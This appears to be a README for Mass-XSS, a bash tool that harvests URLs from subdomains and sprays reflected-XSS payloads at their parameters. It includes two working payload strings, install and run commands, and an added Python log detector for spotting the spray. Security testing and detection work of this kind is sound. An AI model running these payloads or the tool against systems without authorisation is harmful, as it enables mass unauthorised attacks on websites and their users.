Mass-XSS is a bash one-liner-style automation that takes a list of subdomains and hunts reflected XSS at scale. It harvests historical and crawled URLs from multiple sources, filters down to parameterised endpoints, and sprays XSS payloads via airixss to validate hits.
subdomains.txt
    ├─► gau              ──┐
    ├─► waybackurls        ├─► merged URL set
    ├─► katana (passive)   │
    └─► hakrawler        ──┘
                                  │
                                  ▼
                     filter to ?param=value URLs
                                  │
                                  ▼
                 qsreplace + airixss (XSS detection)
                                  │
                                  ▼
                             results.txt
Requires Go 1.17+.
go install github.com/lc/gau/v2/cmd/gau@latest
go install github.com/tomnomnom/waybackurls@latest
go install github.com/projectdiscovery/katana/cmd/katana@latest
go install github.com/hakluke/hakrawler@latest
go install github.com/tomnomnom/qsreplace@latest
go install github.com/ferreiraklet/airixss@latest
Make sure $GOPATH/bin (or $HOME/go/bin) is in your PATH.
git clone https://github.com/PiyushThePal/Mass-XSS.git
cd Mass-XSS
chmod +x mass-xss.sh
./mass-xss.sh subdomains.txt
Outputs:
URLS/gau_urls.txt, URLS/wayback.urls.txt, URLS/ktna_urls.txt, URLS/hkrwlr_url.txt — raw URL collections from each source
URLS/param_urls.txt — URLs containing ? or =
results.txt — confirmed XSS hits (only lines containing the payload marker)
The script tests two payload shapes against every parameterised URL:
';confirm(1447);//cxxx
"><img/src/onerror=confirm(1447)>
Both fire confirm(1447) — airixss looks for that exact string in the rendered page to confirm execution. To customise, edit the qsreplace lines and the -p arguments in mass-xss.sh.
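For the receiving side, the fixed confirm(1447) marker and the way qsreplace writes it into query parameters make a run easy to spot in web server access logs. The sketch below is an added example, not part of Mass-XSS; it assumes combined-format access logs, and the function names and sample log lines are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

MARKER = "confirm(1447)"  # string shared by both payload shapes above
# Combined log format: client IP, two fields, [timestamp], "METHOD URI PROTO"
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*"')

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2025:10:00:01 +0000] "GET /search?q=%27%3Bconfirm%281447%29%3B%2F%2Fcxxx HTTP/1.1" 200 512
203.0.113.7 - - [01/Jan/2025:10:00:01 +0000] "GET /item?id=%22%3E%3Cimg%2Fsrc%2Fonerror%3Dconfirm%281447%29%3E&ref=%22%3E%3Cimg%2Fsrc%2Fonerror%3Dconfirm%281447%29%3E HTTP/1.1" 200 734
203.0.113.7 - - [01/Jan/2025:10:00:02 +0000] "GET /search?q=%22%3E%3Cimg%2Fsrc%2Fonerror%3Dconfirm%281447%29%3E HTTP/1.1" 200 512
198.51.100.4 - - [01/Jan/2025:10:00:03 +0000] "GET /search?q=shoes HTTP/1.1" 200 901
198.51.100.9 - - [01/Jan/2025:10:00:04 +0000] "GET /docs?q=confirm%281447%29 HTTP/1.1" 200 100
"""


def marker_params(uri):
    """Names of query parameters whose URL-decoded value contains MARKER."""
    query = urlsplit(uri).query
    return [k for k, v in parse_qsl(query, keep_blank_values=True) if MARKER in v]


def find_spray(log_text, min_paths=2):
    """Map client IP -> sorted distinct paths requested with the marker.

    Only clients that hit at least min_paths different paths are returned,
    which separates a spray from a single stray request.
    """
    hits = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a request line in the assumed format
        ip, uri = m.group(1), m.group(2)
        if marker_params(uri):
            hits[ip].add(urlsplit(uri).path)
    return {ip: sorted(p) for ip, p in hits.items() if len(p) >= min_paths}


if __name__ == "__main__":
    for ip, paths in find_spray(SAMPLE_LOG).items():
        print(ip, paths)
```

If the payloads in mass-xss.sh have been customised, MARKER has to be changed to match; the per-client path count still applies.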
This tool is for authorized security testing only — bug bounty programs with explicit XSS scope, internal pentests, CTFs, or your own infrastructure. Spraying XSS payloads at targets you don't have permission to test is illegal and unethical.
MIT